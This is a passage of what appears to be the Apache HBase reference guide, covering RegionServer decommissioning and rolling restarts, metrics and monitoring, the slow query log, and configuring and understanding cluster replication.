To decommission a loaded RegionServer, run the following: +$ ./bin/graceful_stop.sh HOSTNAME+ where `HOSTNAME` is the host carrying the RegionServer you would decommission.

.On `HOSTNAME`
[NOTE]
====
The `HOSTNAME` passed to _graceful_stop.sh_ must match the hostname that hbase is using to identify RegionServers.
Check the list of RegionServers in the master UI for how HBase is referring to servers.
It's usually hostname but can also be FQDN.
Whatever HBase is using, this is what you should pass to the _graceful_stop.sh_ decommission script.
If you pass IPs, the script is not yet smart enough to make a hostname (or FQDN) of it and so it will fail when it checks if the server is currently running; the graceful unloading of regions will not run.
====
The _graceful_stop.sh_ script will move the regions off the decommissioned RegionServer one at a time to minimize region churn.
It will verify the region is deployed in the new location before it moves the next region, and so on, until the decommissioned server is carrying zero regions.
At this point, the _graceful_stop.sh_ script tells the RegionServer `stop`.
The master will at this point notice the RegionServer gone but all regions will have already been redeployed, and because the RegionServer went down cleanly, there will be no WAL logs to split.

[[lb]]
.Load Balancer
[NOTE]
====
It is assumed that the Region Load Balancer is disabled while the `graceful_stop` script runs (otherwise the balancer and the decommission script will end up fighting over region deployments). Use the shell to disable the balancer:

[source]
----
hbase(main):001:0> balance_switch false
true
0 row(s) in 0.3590 seconds
----

This turns the balancer OFF.
To reenable, do:

[source]
----
hbase(main):001:0> balance_switch true
false
0 row(s) in 0.3590 seconds
----

The `graceful_stop` will check the balancer and if enabled, will turn it off before it goes to work.
If it exits prematurely because of error, it will not have reset the balancer.
Hence, it is better to manage the balancer apart from `graceful_stop`, reenabling it after you are done with graceful_stop.
====

[[draining.servers]]
==== Decommissioning several RegionServers concurrently

If you have a large cluster, you may want to decommission more than one machine at a time by gracefully stopping multiple RegionServers concurrently.
To gracefully drain multiple regionservers at the same time, RegionServers can be put into a "draining" state.
This is done by marking a RegionServer as a draining node by creating an entry in ZooKeeper under the _hbase_root/draining_ znode.
This znode has format `name,port,startcode` just like the regionserver entries under _hbase_root/rs_ znode.

Without this facility, decommissioning multiple nodes may be non-optimal because regions that are being drained from one region server may be moved to other regionservers that are also draining.
Marking RegionServers to be in the draining state prevents this from happening.
See this link:http://inchoate-clatter.blogspot.com/2012/03/hbase-ops-automation.html[blog post] for more details.
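As a sketch, you can create the draining znode by hand with the ZooKeeper CLI that ships with HBase. The server name below is a hypothetical placeholder, and the parent znode is assumed to be the default _/hbase_:

[source]
----
# Mark a RegionServer as draining by creating its znode under /hbase/draining.
# Copy the exact name,port,startcode string from the /hbase/rs listing.
$ ./bin/hbase zkcli
[zk: localhost:2181(CONNECTED) 0] ls /hbase/rs
[regionserver1.example.com,60020,1431024356678]
[zk: localhost:2181(CONNECTED) 1] create /hbase/draining/regionserver1.example.com,60020,1431024356678 ""
----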
[[bad.disk]]
==== Bad or Failing Disk

It is good having <<dfs.datanode.failed.volumes.tolerated,dfs.datanode.failed.volumes.tolerated>> set if you have a decent number of disks per machine for the case where a disk plain dies.
But usually disks do the "John Wayne" -- i.e. take a while to go down spewing errors in _dmesg_ -- or for some reason, run much slower than their companions.
In this case you want to decommission the disk.
You have two options.
You can link:http://wiki.apache.org/hadoop/FAQ#I_want_to_make_a_large_cluster_smaller_by_taking_out_a_bunch_of_nodes_simultaneously._How_can_this_be_done.3F[decommission the datanode] or, less disruptive in that only the bad disk's data will be re-replicated, you can stop the datanode, unmount the bad volume (you can't umount a volume while the datanode is using it), and then restart the datanode (presuming you have set dfs.datanode.failed.volumes.tolerated > 0).
The regionserver will throw some errors in its logs as it recalibrates where to get its data from -- it will likely roll its WAL log too -- but in general, apart from some latency spikes, it should keep on chugging.

.Short Circuit Reads
[NOTE]
====
If you are doing short-circuit reads, you will have to move the regions off the regionserver before you stop the datanode; with short-circuit reads, even though the files are chmod'd so the regionserver cannot access them, because it already has the files open it will be able to keep reading the file blocks from the bad disk even though the datanode is down.
Move the regions back after you restart the datanode.
====

[[rolling]]
=== Rolling Restart

Some cluster configuration changes require either the entire cluster, or the RegionServers, to be restarted in order to pick up the changes.
In addition, rolling restarts are supported for upgrading to a minor or maintenance release, and to a major release if at all possible.
See the release notes for the release you want to upgrade to, to find out about limitations to the ability to perform a rolling upgrade.

There are multiple ways to restart your cluster nodes, depending on your situation.
These methods are detailed below.

==== Using the `rolling-restart.sh` Script

HBase ships with a script, _bin/rolling-restart.sh_, that allows you to perform rolling restarts on the entire cluster, the master only, or the RegionServers only.
The script is provided as a template for your own script, and is not explicitly tested.
It requires password-less SSH login to be configured and assumes that you have deployed using a tarball.
The script requires you to set some environment variables before running it.
Examine the script and modify it to suit your needs.

._rolling-restart.sh_ General Usage
====
----
$ ./bin/rolling-restart.sh --help
Usage: rolling-restart.sh [--config <hbase-confdir>] [--rs-only] [--master-only] [--graceful] [--maxthreads xx]
----
====

Rolling Restart on RegionServers Only::
 To perform a rolling restart on the RegionServers only, use the `--rs-only` option.
 This might be necessary if you need to reboot the individual RegionServer or if you make a configuration change that only affects RegionServers and not the other HBase processes.

Rolling Restart on Masters Only::
 To perform a rolling restart on the active and backup Masters, use the `--master-only` option.
 You might use this if you know that your configuration change only affects the Master and not the RegionServers, or if you need to restart the server where the active Master is running.

Graceful Restart::
 If you specify the `--graceful` option, RegionServers are restarted using the _bin/graceful_stop.sh_ script, which moves regions off a RegionServer before restarting it.
 This is safer, but can delay the restart.

Limiting the Number of Threads::
 To limit the rolling restart to using only a specific number of threads, use the `--maxthreads` option.

[[rolling.restart.manual]]
==== Manual Rolling Restart

To retain more control over the process, you may wish to manually do a rolling restart across your cluster.
This uses the _graceful_stop.sh_ script described in <<decommission,decommission>>.
In this method, you can restart each RegionServer individually and then move its old regions back into place, retaining locality.
If you also need to restart the Master, you need to do it separately, and restart the Master before restarting the RegionServers using this method.
The following is an example of such a command.
You may need to tailor it to your environment.
This script does a rolling restart of RegionServers only.
It disables the load balancer before moving the regions.

----
$ for i in `cat conf/regionservers|sort`; do ./bin/graceful_stop.sh --restart --reload --debug $i; done &> /tmp/log.txt &
----

Monitor the output of the _/tmp/log.txt_ file to follow the progress of the script.

==== Logic for Crafting Your Own Rolling Restart Script

Use the following guidelines if you want to create your own rolling restart script.

. Extract the new release, verify its configuration, and synchronize it to all nodes of your cluster using `rsync`, `scp`, or another secure synchronization mechanism.
. Use the hbck utility to ensure that the cluster is consistent.
+
----
$ ./bin/hbase hbck
----
+
Perform repairs if required.
See <<hbck,hbck>> for details.

. Restart the master first.
 You may need to modify these commands if your new HBase directory is different from the old one, such as for an upgrade.
+
----
$ ./bin/hbase-daemon.sh stop master; ./bin/hbase-daemon.sh start master
----

. Gracefully restart each RegionServer, using a script such as the following, from the Master.
+
----
$ for i in `cat conf/regionservers|sort`; do ./bin/graceful_stop.sh --restart --reload --debug $i; done &> /tmp/log.txt &
----
+
If you are running Thrift or REST servers, pass the --thrift or --rest options.
For other available options, run the `bin/graceful_stop.sh --help` command.
+
It is important to drain HBase regions slowly when restarting multiple RegionServers.
Otherwise, multiple regions go offline simultaneously and must be reassigned to other nodes, which may also go offline soon.
This can negatively affect performance.
You can inject delays into the script above, for instance, by adding a Shell command such as `sleep`.
To wait for 5 minutes between each RegionServer restart, modify the above script to the following:
+
----
$ for i in `cat conf/regionservers|sort`; do ./bin/graceful_stop.sh --restart --reload --debug $i & sleep 5m; done &> /tmp/log.txt &
----

. Restart the Master again, to clear out the dead servers list and re-enable the load balancer.
. Run the `hbck` utility again, to be sure the cluster is consistent.
[[adding.new.node]]
=== Adding a New Node

Adding a new regionserver in HBase is essentially free: you simply start it like this: `$ ./bin/hbase-daemon.sh start regionserver`, and it will register itself with the master.
Ideally you also started a DataNode on the same machine so that the RS can eventually start to have local files.
If you rely on ssh to start your daemons, don't forget to add the new hostname in _conf/regionservers_ on the master.

At this point the region server isn't serving data because no regions have moved to it yet.
If the balancer is enabled, it will start moving regions to the new RS.
On a small/medium cluster this can have a very adverse effect on latency as a lot of regions will be offline at the same time.
It is thus recommended to disable the balancer the same way it's done when decommissioning a node and move the regions manually (or even better, using a script that moves them one by one; a minimal sketch follows at the end of this section).

The moved regions will all have 0% locality and won't have any blocks in cache, so the region server will have to use the network to serve requests.
Apart from resulting in higher latency, it may also use all of your network card's capacity.
For practical purposes, consider that a standard 1GigE NIC won't be able to read much more than _100MB/s_.
In this case, or if you are in an OLAP environment and require having locality, then it is recommended to major compact the moved regions.
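As a sketch of such a script, each iteration can feed the shell's `move` command one region at a time. The encoded region name and the `host,port,startcode` target below are hypothetical placeholders (the encoded name is the trailing hash portion of the region name, visible in the web UI):

[source,bourne]
----
# Move one region at a time to the newly added server via the HBase shell.
# 'move' takes the region's encoded name and an optional destination server.
$ echo "move 'b713bf1b1b2b4dcd9a8b6d5e7f9c0a1d', 'newnode.example.com,60020,1431024356678'" | ./bin/hbase shell
----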
[[hbase_metrics]]
== HBase Metrics

HBase emits metrics which adhere to the link:http://hadoop.apache.org/core/docs/current/api/org/apache/hadoop/metrics/package-summary.html[Hadoop metrics] API.
Starting with HBase 0.95footnote:[The Metrics system was redone in HBase 0.96. See Migration to the New Metrics Hotness – Metrics2 by Elliot Clark for detail], HBase is configured to emit a default set of metrics with a default sampling period of every 10 seconds.
You can use HBase metrics in conjunction with Ganglia.
You can also filter which metrics are emitted and extend the metrics framework to capture custom metrics appropriate for your environment.

=== Metric Setup

For HBase 0.95 and newer, HBase ships with a default metrics configuration, or [firstterm]_sink_.
This includes a wide variety of individual metrics, and emits them every 10 seconds by default.
To configure metrics for a given region server, edit the _conf/hadoop-metrics2-hbase.properties_ file.
Restart the region server for the changes to take effect.

To change the sampling rate for the default sink, edit the line beginning with `*.period`.
To filter which metrics are emitted or to extend the metrics framework, see http://hadoop.apache.org/docs/current/api/org/apache/hadoop/metrics2/package-summary.html.

.HBase Metrics and Ganglia
[NOTE]
====
By default, HBase emits a large number of metrics per region server.
Ganglia may have difficulty processing all these metrics.
Consider increasing the capacity of the Ganglia server or reducing the number of metrics emitted by HBase.
See link:http://hadoop.apache.org/docs/current/api/org/apache/hadoop/metrics2/package-summary.html#filtering[Metrics Filtering].
====

=== Disabling Metrics

To disable metrics for a region server, edit the _conf/hadoop-metrics2-hbase.properties_ file and comment out any uncommented lines.
Restart the region server for the changes to take effect.

[[discovering.available.metrics]]
=== Discovering Available Metrics

Rather than listing each metric which HBase emits by default, you can browse through the available metrics, either as a JSON output or via JMX.
Different metrics are exposed for the Master process and each region server process.

.Procedure: Access a JSON Output of Available Metrics
. After starting HBase, access the region server's web UI, at pass:[http://REGIONSERVER_HOSTNAME:60030] by default (or port 16030 in HBase 1.0+).
. Click the [label]#Metrics Dump# link near the top.
 The metrics for the region server are presented as a dump of the JMX bean in JSON format.
 This will dump out all metrics names and their values.
 To include metrics descriptions in the listing -- this can be useful when you are exploring what is available -- add a query string of `?description=true` so your URL becomes pass:[http://REGIONSERVER_HOSTNAME:60030/jmx?description=true].
 Not all beans and attributes have descriptions.
. To view metrics for the Master, connect to the Master's web UI instead (defaults to pass:[http://localhost:60010] or port 16010 in HBase 1.0+) and click its [label]#Metrics Dump# link.
 To include metrics descriptions in the listing -- this can be useful when you are exploring what is available -- add a query string of `?description=true` so your URL becomes pass:[http://MASTER_HOSTNAME:60010/jmx?description=true].
 Not all beans and attributes have descriptions.
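If you prefer the command line or a script, the same JSON dump can be fetched with a plain HTTP client such as `curl`; the hostname placeholder and the pre-1.0 default port below follow the URLs above:

[source,bourne]
----
# Fetch the region server's JMX metrics dump as JSON, with descriptions included.
$ curl 'http://REGIONSERVER_HOSTNAME:60030/jmx?description=true'
----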
You can use many different tools to view JMX content by browsing MBeans.
This procedure uses `jvisualvm`, which is an application usually available in the JDK.

.Procedure: Browse the JMX Output of Available Metrics
. Start HBase, if it is not already running.
. Run the `jvisualvm` command on a host with a GUI display.
 You can launch it from the command line or another method appropriate for your operating system.
. Be sure the [label]#VisualVM-MBeans# plugin is installed. Browse to *Tools -> Plugins*. Click [label]#Installed# and check whether the plugin is listed.
 If not, click [label]#Available Plugins#, select it, and click btn:[Install].
 When finished, click btn:[Close].
. To view details for a given HBase process, double-click the process in the [label]#Local# sub-tree in the left-hand panel.
 A detailed view opens in the right-hand panel.
 Click the [label]#MBeans# tab which appears as a tab in the top of the right-hand panel.
. To access the HBase metrics, navigate to the appropriate sub-bean:
.* Master:
.* RegionServer:

. The name of each metric and its current value is displayed in the [label]#Attributes# tab.
 For a view which includes more details, including the description of each attribute, click the [label]#Metadata# tab.

=== Units of Measure for Metrics

Different metrics are expressed in different units, as appropriate.
Often, the unit of measure is in the name (as in the metric `shippedKBs`). Otherwise, use the following guidelines.
When in doubt, you may need to examine the source for a given metric.

* Metrics that refer to a point in time are usually expressed as a timestamp.
* Metrics that refer to an age (such as `ageOfLastShippedOp`) are usually expressed in milliseconds.
* Metrics that refer to memory sizes are in bytes.
* Sizes of queues (such as `sizeOfLogQueue`) are expressed as the number of items in the queue.
 Determine the size by multiplying by the block size (default is 64 MB in HDFS).
* Metrics that refer to things like the number of a given type of operations (such as `logEditsRead`) are expressed as an integer.

[[master_metrics]]
=== Most Important Master Metrics

Note: Counts are usually over the last metrics reporting interval.

hbase.master.numRegionServers::
 Number of live regionservers

hbase.master.numDeadRegionServers::
 Number of dead regionservers

hbase.master.ritCount::
 The number of regions in transition

hbase.master.ritCountOverThreshold::
 The number of regions that have been in transition longer than a threshold time (default: 60 seconds)

hbase.master.ritOldestAge::
 The age of the longest region in transition, in milliseconds

[[rs_metrics]]
=== Most Important RegionServer Metrics

Note: Counts are usually over the last metrics reporting interval.

hbase.regionserver.regionCount::
 The number of regions hosted by the regionserver

hbase.regionserver.storeFileCount::
 The number of store files on disk currently managed by the regionserver

hbase.regionserver.storeFileSize::
 Aggregate size of the store files on disk

hbase.regionserver.hlogFileCount::
 The number of write ahead logs not yet archived

hbase.regionserver.totalRequestCount::
 The total number of requests received

hbase.regionserver.readRequestCount::
 The number of read requests received

hbase.regionserver.writeRequestCount::
 The number of write requests received

hbase.regionserver.numOpenConnections::
 The number of open connections at the RPC layer

hbase.regionserver.numActiveHandler::
 The number of RPC handlers actively servicing requests

hbase.regionserver.numCallsInGeneralQueue::
 The number of currently enqueued user requests

hbase.regionserver.numCallsInReplicationQueue::
 The number of currently enqueued operations received from replication
hbase.regionserver.numCallsInPriorityQueue::
 The number of currently enqueued priority (internal housekeeping) requests

hbase.regionserver.flushQueueLength::
 Current depth of the memstore flush queue.
 If increasing, we are falling behind with clearing memstores out to HDFS.

hbase.regionserver.updatesBlockedTime::
 Number of milliseconds updates have been blocked so the memstore can be flushed

hbase.regionserver.compactionQueueLength::
 Current depth of the compaction request queue.
 If increasing, we are falling behind with storefile compaction.

hbase.regionserver.blockCacheHitCount::
 The number of block cache hits

hbase.regionserver.blockCacheMissCount::
 The number of block cache misses

hbase.regionserver.blockCacheExpressHitPercent::
 The percent of the time that requests with the cache turned on hit the cache

hbase.regionserver.percentFilesLocal::
 Percent of store file data that can be read from the local DataNode, 0-100

hbase.regionserver.<op>_<measure>::
 Operation latencies, where <op> is one of Append, Delete, Mutate, Get, Replay, Increment; and where <measure> is one of min, max, mean, median, 75th_percentile, 95th_percentile, 99th_percentile

hbase.regionserver.slow<op>Count::
 The number of operations we thought were slow, where <op> is one of the list above

hbase.regionserver.GcTimeMillis::
 Time spent in garbage collection, in milliseconds

hbase.regionserver.GcTimeMillisParNew::
 Time spent in garbage collection of the young generation, in milliseconds

hbase.regionserver.GcTimeMillisConcurrentMarkSweep::
 Time spent in garbage collection of the old generation, in milliseconds

hbase.regionserver.authenticationSuccesses::
 Number of client connections where authentication succeeded

hbase.regionserver.authenticationFailures::
 Number of client connection authentication failures

hbase.regionserver.mutationsWithoutWALCount::
 Count of writes submitted with a flag indicating they should bypass the write ahead log

[[ops.monitoring]]
== HBase Monitoring

[[ops.monitoring.overview]]
=== Overview

The following metrics are arguably the most important to monitor for each RegionServer for "macro monitoring", preferably with a system like link:http://opentsdb.net/[OpenTSDB].
If your cluster is having performance issues it's likely that you'll see something unusual with this group.

HBase::
 * See <<rs_metrics,rs metrics>>

OS::
 * IO Wait
 * User CPU

Java::
 * GC

For more information on HBase metrics, see <<hbase_metrics,hbase metrics>>.

[[ops.slow.query]]
=== Slow Query Log

The HBase slow query log consists of parseable JSON structures describing the properties of those client operations (Gets, Puts, Deletes, etc.)
that either took too long to run, or produced too much output.
The thresholds for "too long to run" and "too much output" are configurable, as described below.
The output is produced inline in the main region server logs so that it is easy to discover further details from context with other logged events.
It is also prepended with identifying tags `(responseTooSlow)`, `(responseTooLarge)`, `(operationTooSlow)`, and `(operationTooLarge)` in order to enable easy filtering with grep, in case the user desires to see only slow queries.

==== Configuration

There are two configuration knobs that can be used to adjust the thresholds for when queries are logged.

* `hbase.ipc.warn.response.time` Maximum number of milliseconds that a query can be run without being logged.
 Defaults to 10000, or 10 seconds.
 Can be set to -1 to disable logging by time.
* `hbase.ipc.warn.response.size` Maximum byte size of response that a query can return without being logged.
 Defaults to 100 megabytes.
 Can be set to -1 to disable logging by size.

==== Metrics

The slow query log exposes two metrics to JMX.

* `hadoop.regionserver_rpc_slowResponse` a global metric reflecting the durations of all responses that triggered logging.
* `hadoop.regionserver_rpc_methodName.aboveOneSec` A metric reflecting the durations of all responses that lasted for more than one second.

==== Output

The output is tagged with operation e.g. `(operationTooSlow)` if the call was a client operation, such as a Put, Get, or Delete, which we expose detailed fingerprint information for.
If not, it is tagged `(responseTooSlow)` and still produces parseable JSON output, but with less verbose information solely regarding its duration and size in the RPC itself. `TooLarge` is substituted for `TooSlow` if the response size triggered the logging, with `TooLarge` appearing even in the case that both size and duration triggered logging.

==== Example

[source]
----
2011-09-08 10:01:25,824 WARN org.apache.hadoop.ipc.HBaseServer: (operationTooSlow): {"tables":{"riley2":{"puts":[{"totalColumns":11,"families":{"actions":[{"timestamp":1315501284459,"qualifier":"0","vlen":9667580},{"timestamp":1315501284459,"qualifier":"1","vlen":10122412},{"timestamp":1315501284459,"qualifier":"2","vlen":11104617},{"timestamp":1315501284459,"qualifier":"3","vlen":13430635}]},"row":"cfcd208495d565ef66e7dff9f98764da:0"}],"families":["actions"]}},"processingtimems":956,"client":"10.47.34.63:33623","starttimems":1315501284456,"queuetimems":0,"totalPuts":1,"class":"HRegionServer","responsesize":0,"method":"multiPut"}
----

Note that everything inside the "tables" structure is output produced by MultiPut's fingerprint, while the rest of the information is RPC-specific, such as processing time and client IP/port.
Other client operations follow the same pattern and the same general structure, with necessary differences due to the nature of the individual operations.
In the case that the call is not a client operation, that detailed fingerprint information will be completely absent.

This particular example would indicate that the likely cause of slowness is simply a very large (on the order of 100MB) multiput, as we can tell by the "vlen," or value length, fields of each put in the multiPut.
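Because each entry is tagged inline in the region server log, a plain `grep` is enough to pull out only the slow queries; the log file path below is a hypothetical example and depends on your log4j settings:

[source,bourne]
----
# Show only slow-query entries (and their JSON payloads) from a region server log.
$ grep -E '\((operationTooSlow|responseTooSlow|operationTooLarge|responseTooLarge)\)' /var/log/hbase/hbase-regionserver.log
----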
=== Block Cache Monitoring

Starting with HBase 0.98, the HBase Web UI includes the ability to monitor and report on the performance of the block cache.
To view the block cache reports, see the Block Cache section of the region server's web UI.
Following are a few examples of the reporting capabilities.

.Basic Info
image::bc_basic.png[]

.Config
image::bc_config.png[]

.Stats
image::bc_stats.png[]

.L1 and L2
image::bc_l1.png[]

This is not an exhaustive list of all the screens and reports available.
Have a look in the Web UI.

== Cluster Replication

NOTE: This information was previously available at link:http://hbase.apache.org#replication[Cluster Replication].

HBase provides a cluster replication mechanism which allows you to keep one cluster's state synchronized with that of another cluster, using the write-ahead log (WAL) of the source cluster to propagate the changes.
Some use cases for cluster replication include:

* Backup and disaster recovery
* Data aggregation
* Geographic data distribution
* Online data ingestion combined with offline data analytics

NOTE: Replication is enabled at the granularity of the column family.
Before enabling replication for a column family, create the table and all column families to be replicated, on the destination cluster.

=== Replication Overview

Cluster replication uses a source-push methodology.
An HBase cluster can be a source (also called master or active, meaning that it is the originator of new data), a destination (also called slave or passive, meaning that it receives data via replication), or can fulfill both roles at once.
Replication is asynchronous, and the goal of replication is eventual consistency.
When the source receives an edit to a column family with replication enabled, that edit is propagated to all destination clusters using the WAL for that column family on the RegionServer managing the relevant region.

When data is replicated from one cluster to another, the original source of the data is tracked via a cluster ID which is part of the metadata.
In HBase 0.96 and newer (link:https://issues.apache.org/jira/browse/HBASE-7709[HBASE-7709]), all clusters which have already consumed the data are also tracked.
This prevents replication loops.

The WALs for each region server must be kept in HDFS as long as they are needed to replicate data to any slave cluster.
Each region server reads from the oldest log it needs to replicate and keeps track of its progress processing WALs inside ZooKeeper to simplify failure recovery.
The position marker which indicates a slave cluster's progress, as well as the queue of WALs to process, may be different for every slave cluster.

The clusters participating in replication can be of different sizes.
The master cluster relies on randomization to attempt to balance the stream of replication on the slave clusters.
It is expected that the slave cluster has storage capacity to hold the replicated data, as well as any data it is responsible for ingesting.
If a slave cluster does run out of room, or is inaccessible for other reasons, it throws an error and the master retains the WAL and retries the replication at intervals.

.Consistency Across Replicated Clusters
[WARNING]
====
How your application builds on top of the HBase API matters when replication is in play. HBase's replication system provides at-least-once delivery of client edits for an enabled column family to each configured destination cluster. In the event of failure to reach a given destination, the replication system will retry sending edits in a way that might repeat a given message.
Furthermore, there is not a guaranteed order of delivery for client edits. In the event of a RegionServer failing, recovery of the replication queue happens independently of recovery of the individual regions that server was previously handling. This means that it is possible for the not-yet-replicated edits to be serviced by a RegionServer that is currently slower to replicate than the one that handles edits from after the failure.

The combination of these two properties (at-least-once delivery and the lack of message ordering) means that some destination clusters may end up in a different state if your application makes use of operations that are not idempotent, e.g. Increments.
====

.Terminology Changes
[NOTE]
====
Previously, terms such as [firstterm]_master-master_, [firstterm]_master-slave_, and [firstterm]_cyclical_ were used to describe replication relationships in HBase.
These terms added confusion, and have been abandoned in favor of discussions about cluster topologies appropriate for different scenarios.
====

.Cluster Topologies
* A central source cluster might propagate changes out to multiple destination clusters, for failover or due to geographic distribution.
* A source cluster might push changes to a destination cluster, which might also push its own changes back to the original cluster.
* Many different low-latency clusters might push changes to one centralized cluster for backup or resource-intensive data analytics jobs.
 The processed data might then be replicated back to the low-latency clusters.

Multiple levels of replication may be chained together to suit your organization's needs.
The following diagram shows a hypothetical scenario.
Use the arrows to follow the data paths.

.Example of a Complex Cluster Replication Configuration
image::hbase_replication_diagram.jpg[]

HBase replication borrows many concepts from the [firstterm]_statement-based replication_ design used by MySQL.
Instead of SQL statements, entire WALEdits (consisting of multiple cell inserts coming from Put and Delete operations on the clients) are replicated in order to maintain atomicity.

=== Managing and Configuring Cluster Replication

.Cluster Configuration Overview

. Configure and start the source and destination clusters.
 Create tables with the same names and column families on both the source and destination clusters, so that the destination cluster knows where to store data it will receive.
. All hosts in the source and destination clusters should be reachable to each other.
. If both clusters use the same ZooKeeper cluster, you must use a different `zookeeper.znode.parent`, because they cannot write in the same folder.
. Check to be sure that replication has not been disabled. `hbase.replication` defaults to `true`.
. On the source cluster, in HBase Shell, add the destination cluster as a peer, using the `add_peer` command.
. On the source cluster, in HBase Shell, enable the table replication, using the `enable_table_replication` command.
. Check the logs to see if replication is taking place. If so, you will see messages like the following, coming from the ReplicationSource.

----
LOG.info("Replicating "+clusterId + " -> " + peerClusterId);
----
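As an illustration of steps 5 and 6 above, a source-cluster shell session might look like the following. The peer ID `1`, the ZooKeeper quorum, and the table name are hypothetical; the cluster key follows the template described under `add_peer` below:

[source]
----
# On the source cluster: register the slave as peer '1', then enable
# replication of every column family of 'my_table' to that peer.
hbase> add_peer '1', 'zk1.example.com,zk2.example.com,zk3.example.com:2181:/hbase'
hbase> enable_table_replication 'my_table'
----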
.Cluster Management Commands
add_peer <ID> <CLUSTER_KEY>::
 Adds a replication relationship between two clusters. +
 * ID -- a unique string, which must not contain a hyphen.
 * CLUSTER_KEY: composed using the following template, with appropriate place-holders: `hbase.zookeeper.quorum:hbase.zookeeper.property.clientPort:zookeeper.znode.parent`
list_peers:: list all replication relationships known by this cluster
enable_peer <ID>::
 Enable a previously-disabled replication relationship
disable_peer <ID>::
 Disable a replication relationship. HBase will no longer send edits to that peer cluster, but it still keeps track of all the new WALs that it will need to replicate if and when it is re-enabled. WALs are retained when enabling or disabling replication as long as peers exist.
remove_peer <ID>::
 Disable and remove a replication relationship. HBase will no longer send edits to that peer cluster or keep track of WALs.
enable_table_replication <TABLE_NAME>::
 Enable the table replication switch for all its column families. If the table is not found in the destination cluster then it will create one with the same name and column families.
disable_table_replication <TABLE_NAME>::
 Disable the table replication switch for all its column families.

=== Verifying Replicated Data

The `VerifyReplication` MapReduce job, which is included in HBase, performs a systematic comparison of replicated data between two different clusters. Run the VerifyReplication job on the master cluster, supplying it with the peer ID and table name to use for validation. You can limit the verification further by specifying a time range or specific families. The job's short name is `verifyrep`. To run the job, use a command like the following:

[source,bash]
----
$ HADOOP_CLASSPATH=`${HBASE_HOME}/bin/hbase classpath` "${HADOOP_HOME}/bin/hadoop" jar "${HBASE_HOME}/hbase-server-VERSION.jar" verifyrep --starttime=<timestamp> --endtime=<timestamp> --families=<myFam> <ID> <tableName>
----

The `VerifyReplication` command prints out `GOODROWS` and `BADROWS` counters to indicate rows that did and did not replicate correctly.

=== Detailed Information About Cluster Replication

.Replication Architecture Overview
image::replication_overview.png[]

==== Life of a WAL Edit

A single WAL edit goes through several steps in order to be replicated to a slave cluster.

. An HBase client uses a Put or Delete operation to manipulate data in HBase.
. The region server writes the request to the WAL in a way that allows it to be replayed if it is not written successfully.
. If the changed cell corresponds to a column family that is scoped for replication, the edit is added to the queue for replication.
. In a separate thread, the edit is read from the log, as part of a batch process.
 Only the KeyValues that are eligible for replication are kept.
 Replicable KeyValues are part of a column family whose schema is scoped GLOBAL, are not part of a catalog such as `hbase:meta`, did not originate from the target slave cluster, and have not already been consumed by the target slave cluster.
. The edit is tagged with the master's UUID and added to a buffer.
 When the buffer is filled, or the reader reaches the end of the file, the buffer is sent to a random region server on the slave cluster.
. The region server reads the edits sequentially and separates them into buffers, one buffer per table.
 After all edits are read, each buffer is flushed using link:http://hbase.apache.org/apidocs/org/apache/hadoop/hbase/client/Table.html[Table], HBase's normal client.
 The master's UUID and the UUIDs of slaves which have already consumed the data are preserved in the edits as they are applied, in order to prevent replication loops.
. In the master, the offset for the WAL that is currently being replicated is registered in ZooKeeper.

If the slave cluster is unavailable, the process differs in the following ways:

. The first three steps, where the edit is inserted, are identical.
. Again in a separate thread, the region server reads, filters, and edits the log edits in the same way as above.
 The slave region server does not answer the RPC call.
. The master sleeps and tries again a configurable number of times.
. If the slave region server is still not available, the master selects a new subset of region servers to replicate to, and tries again to send the buffer of edits.
. Meanwhile, the WALs are rolled and stored in a queue in ZooKeeper.
 Logs that are [firstterm]_archived_ by their region server, by moving them from the region server's log directory to a central log directory, will update their paths in the in-memory queue of the replicating thread.
. When the slave cluster is finally available, the buffer is applied in the same way as during normal processing.
 The master region server will then replicate the backlog of logs that accumulated during the outage.

.Spreading Queue Failover Load
When replication is active, a subset of region servers in the source cluster is responsible for shipping edits to the sink.
This responsibility must be failed over like all other region server functions should a process or node crash.
The following configuration settings are recommended for maintaining an even distribution of replication activity over the remaining live servers in the source cluster:

* Set `replication.source.maxretriesmultiplier` to `300`.
* Set `replication.source.sleepforretries` to `1` (1 second).
This value, combined with the value of `replication.source.maxretriesmultiplier`, causes the retry cycle to last about 5 minutes.
* Set `replication.sleep.before.failover` to `30000` (30 seconds) in the source cluster site configuration.

[[cluster.replication.preserving.tags]]
.Preserving Tags During Replication
By default, the codec used for replication between clusters strips tags, such as cell-level ACLs, from cells.
To prevent the tags from being stripped, you can use a different codec which does not strip them.
Configure `hbase.replication.rpc.codec` to use `org.apache.hadoop.hbase.codec.KeyValueCodecWithTags`, on both the source and sink RegionServers involved in the replication.
This option was introduced in link:https://issues.apache.org/jira/browse/HBASE-10322[HBASE-10322].

==== Replication Internals

Replication State in ZooKeeper::
 HBase replication maintains its state in ZooKeeper.
 By default, the state is contained in the base node _/hbase/replication_.
 This node contains two child nodes, the `Peers` znode and the `RS` znode.

The `Peers` Znode::
 The `peers` znode is stored in _/hbase/replication/peers_ by default.
 It consists of a list of all peer replication clusters, along with the status of each of them.
 The value of each peer is its cluster key, which is provided in the HBase Shell.
 The cluster key contains a list of ZooKeeper nodes in the cluster's quorum, the client port for the ZooKeeper quorum, and the base znode for HBase on that cluster.

The `RS` Znode::
 The `rs` znode contains a list of WAL logs which need to be replicated.
 This list is divided into a set of queues organized by region server and the peer cluster the region server is shipping the logs to.
 The rs znode has one child znode for each region server in the cluster.
 The child znode name is the region server's hostname, client port, and start code.
 This list includes both live and dead region servers.
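To inspect this state on a running cluster, you can browse these znodes with the ZooKeeper CLI that ships with HBase. A minimal sketch, assuming the default _/hbase/replication_ base node:

[source]
----
# List configured peers and the per-regionserver WAL queues.
$ ./bin/hbase zkcli
[zk: localhost:2181(CONNECTED) 0] ls /hbase/replication/peers
[zk: localhost:2181(CONNECTED) 1] ls /hbase/replication/rs
----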
==== Choosing Region Servers to Replicate To

When a master cluster region server initiates a replication source to a slave cluster, it first connects to the slave's ZooKeeper ensemble using the provided cluster key. It then scans the _rs/_ directory to discover all the available sinks (region servers that are accepting incoming streams of edits to replicate) and randomly chooses a subset of them using a configured ratio which has a default value of 10%.
For example, if a slave cluster has 150 machines, 15 will be chosen as potential recipients for edits that this master cluster region server sends.
Because this selection is performed by each master region server, the probability that all slave region servers are used is very high, and this method works for clusters of any size.
For example, a master cluster of 10 machines replicating to a slave cluster of 5 machines with a ratio of 10% causes the master cluster region servers to choose one machine each at random.

A ZooKeeper watcher is placed on the _${zookeeper.znode.parent}/rs_ node of the slave cluster by each of the master cluster's region servers.
This watch is used to monitor changes in the composition of the slave cluster.
